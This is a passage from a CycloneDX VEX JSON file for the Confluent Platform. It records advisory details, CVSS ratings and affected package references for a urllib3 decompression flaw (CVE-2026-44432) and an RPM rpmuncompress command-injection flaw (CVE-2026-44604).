          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44432",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        409
      ],
      "description": "urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44432"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15862"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20338"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:22934"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24009"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24069"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24476"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24483"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24540"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24541"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24542"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24544"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25039"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26212"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26304"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:27929"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28157"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28158"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28159"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28571"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30076"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30087"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30088"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30089"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:32992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33683"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34526"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34533"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34607"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36350"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44481"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51206"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7625"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7634"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44432"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44432"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-28159.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:32992"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2026-142.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44432.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-32992.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44432.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-08-19T12:18:19+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44604",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        78
      ],
      "description": "A command injection vulnerability was discovered in the `rpmuncompress` utility of RPM. When extracting certain archive formats (ZIP, 7z, GEM) to a specified destination directory, the tool inserts the archive's top-level folder name into a shell command without properly sanitizing it. A specially crafted archive containing shell metacharacters in its folder name can execute arbitrary commands as the user running the extraction.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44604"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28491"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44604"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460967"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44604"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44604"
        }
      ],
      "published": "2026-05-28T08:16:35+00:00",
      "updated": "2026-06-23T20:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
